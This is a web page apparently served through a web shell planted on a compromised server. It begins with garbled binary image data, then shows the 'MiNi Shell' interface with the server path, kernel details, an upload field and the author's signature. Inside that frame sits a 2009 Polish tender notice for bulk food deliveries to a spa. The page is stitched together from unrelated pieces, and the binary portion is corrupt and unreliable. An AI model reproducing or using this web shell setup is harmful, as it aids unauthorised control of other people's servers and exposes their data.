JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/16984-N-2009.html

<p class="kh_header"><b>Szczawno Zdrój: Dostawa produktów spożywczych sypkich.</b><br>
<b>Numer ogłoszenia: 16984 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych sypkich..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sucharki i herbatniki; wyroby ciastkarskie/
1. herbatniki, 150 g/op. - 3800 op.; 2. herbatniki - 50 kg; 3. sucharki, 290 g/op. - 250 op.; 4. wafle ryżowe, 150 g/op. - 125 op.; 5. wafle suche, 130 g/op. - 850 op.
Cukier i produkty pokrewne/
1. cukier - 6200 kg; 2. cukier puder - 25 kg; 3. cukier waniliowy, 16 g/op. - 500 op.; 4. drożdże, 100 g/op. - 30 op.; 5. syrop, 500 ml - 450 szt.
Miód/
1. miód, 380 g - 460 szt.; 2. miód - 25 kg
Kakao, czekolada/
1. czekolada, 100 g - 160 tabl.; 2. kakao, 100 g - 200 szt.; 3. olej - 2500 l.
Produkty mączne, makarony/
1. budyń, 60 g - 2200 szt.; 2. budyń - 25 kg; 3. bułka tarta - 1000 kg; 4. kasza gryczana - 400 kg; 5. kasza jęczmienna - 1500 kg; 6. kasza kukurydziana - 400 kg; 7. kasza manna - 500 kg; 8. kisiel - 50 kh; 9. kisiel, 60 g - 2800 szt.; 10. makaron - 3600 kg; 11. makaron bezglutenowy - 250 kg; 12. mąka ziemniaczana - 255 kg; 13. mąka pszenna - 3200 kg; 14. płatki kukurydziane - 50 kg; 15. płatki miodowe, 250 g/op. - 15 op.; 16. płatki owsiane - 800 kg; 17. płatki ryżowe - 15 kg; 18. ryż - 2600 kg; 19. ryż w torebkach, 400 g - 20 szt.
Kawa, herbata i produkty podobne/
1. cappuccino typu MOCCATE, 150 g - 50 szt.; 2. herbata - 100 kg; 3. herbata ekspresowa typu SAGA, 100 szt./op. - 4200 op.; 4. herbata lipton, 50 szt./op. - 500 op.; 5. herbata owocowa typu SAGA, 25 szt./op. - 2500 op.; 6. kawa rozpuszczalna typu JAKOBS - 150 kg.
Przyprawy i przyprawy korzenne/
1. auszpik - 3 kg; 2. cynamon, 18 g - 195 op.; 3. czosnek mielony, 20 g - 655 op.; 4. goździki, 15 g - 5 op.; 5. kminek, 10 g - 500 op.; 6. koper suszony - 10 kg; 7. kwasek cytrynowy, 15 g - 1500 op.; 8. liść laurowy, 20 g - 190 op.; 9. majeranek, 16 g - 350 op.; 10. olejek do ciast, 10 ml - 110 szt.; 11. papryka mielona - 5 kg; 12. papryka mielona, 15 g - 180 szt.; 13. pieprz, 20 g - 550 szt.; 14. pieprz mielony, 20 g - 100 szt.; 15. pietruszka suszona - 5 kg; 16. proszek do pieczenia, 16 g - 400 szt.; 17. soda oczyszczona, 50 g - 50 szt.; 18. sól - 1800 kg; 19. wiórki kokosowe, 100 g - 45 szt.; 20. ziele angielskie, 20 g - 250 szt.; 21. żelatyna, 50 g - 655 szt.
Ocet, sosy, mieszanki, przyprawy/
1. delikat do mięs - 75 kg; 2. delikat do ryb - 35 kg; 3. fix do chińskich - 10 kg; 4. fix do gulaszu - 8 kg; 5. ketchup, 0,5 l - 450 szt.; 6. maggi, 860 ml - 550 szt.; 7. majonez, 330 g - 1550 szt.; 8. musztarda, 190 g - 955 szt.; 9. ocet, 0,5 l - 250 szt.; 10. 	sos biały - 15 kg; 11. sos napoli/pieczeniowy - 55 kg; 12. sos sałatkowy - 30 kg; 13. sos z pieprzem - 10 kg; 14. vegetta, 200 g - 1100 szt.
Zupy i buliony/
1. barszcz czerwony - 45 kg; 2. bulion jarzynowy - 250 kg; 3. zupa cebulowa - 10 kg; 4. zupa pieczarkowa - 25 kg; 5. zupa senatorska - 10 kg; 6. żurek - 50 kg.

Dostawy nie rzadziej niż trzy razy w tygodniu w godzinach od 7:00 do 9:00 w ilościach i asortymencie zależnym od potrzeb (na żądanie Zamawiającego).
W wszystkie produkty muszą posiadać niezbędne dokumenty badań i dopuszczenia do obrotu oraz certyfikaty i atesty wymagane stosownymi przepisami i normami.
Wszelkie koszty wydania przedmiotu umowy, w szczególności koszty opakowania, przesłania, załadunku, rozładunku i ubezpieczenia ponosi Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.85.11.00-9, 15.86.10.00-1, 15.89.10.00-0, 15.61.22.20-9, 15.84.10.00-5, 03.13.20.00-5, 15.83.10.00-2, 03.14.21.00-9, 15.87.00.00-7, 15.84.20.00-2, 15.86.00.00-4, 15.87.12.50-1, 03.21.13.00-6, 15.86.41.00-3, 15.87.11.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia.
1.5 W okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie) Wykonawca wykonał co najmniej 2 usługi o charakterze i w zakresie (wartościowym i przedmiotowym) zbliżonym do przedmiotu zamówienia.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców, o których mowa w art. 24 ustawy Prawo Zamówień publicznych.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą <spełnia - nie spełnia> w oparciu o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w pkt. X i XI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.
Niespełnienie chociażby jednego z opisanych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem termi-nu składania ofert. UWAGA: W przypadku Wykonawców prowadzących działalność w formie spółki cywilnej wymagane dokumenty rejestracyjne winny dotyczyć wszystkich wspólników.
2) Oświadczenie Wykonawcy o nie zaleganiu z opłaceniem podatków lub zaświadczenie z właściwego Urzędu Skarbowego, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Zaświadczenie musi być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3) Oświadczenie Wykonawcy o nie zaleganiu z opłaceniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenie musi być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu w zakresie określonym w art. 22 i art. 24 Prawa zamówień publicznych (formularzu oferty).
5) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak 200.000,00 zł (słownie: dwieście tysięcy 00/100 zł).
6) Wykaz dokonanych usług (co najmniej 2 usługi), o charakterze zbliżonym do przedmiotu zamówienia, które Wykonawca wykonał w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie) i łącznej wartości nie mniejszej niż 150 tyś zł.
7) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Pol-skiej zamiast w/w dokumentu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania zgodnie z przepisami § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605).
B. Dokumenty wymagane w przypadku składania oferty wspólnej:
Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. od A1 do A6 dla każdego partnera z osobna.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem <za zgodność z oryginałem>.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
XI. Dokumenty i oświadczenia żądane na potwierdzenie, że oferowane dostawy odpowiadają wymogom stawianym przez Zamawiającego.
W celu potwierdzenia, że oferowane produkty odpowiadają wymaganiom określonym przez Zamawiającego w pkt. III SIWZ, Wykonawcy zobowiązani są do dołączenia do oferty oświadczenia, że posiada on na oferowane produkty niezbędne dokumenty badan i dopuszczeń do obrotu, certyfikatów i atestów wymaganych przez stosowne przepisy i normy. Dokumenty te, atesty, certyfikaty itd. Wykonawcy zobowiązani będą do dołączenia dla Zamawiającego jako załączniki do protokołu odbioru każdej z wykonanej dostawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.szczawno-jedlina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Szczawno-Jedlina S.A.,  ul. Ratuszowa 1,  58-310 Szczawno Zdrój.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2009 godzina 10:00, miejsce: Uzdrowisko Szczawno-Jedlina S.A.  ul. Ratuszowa 1,  58-310 Szczawno Zdrój,  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com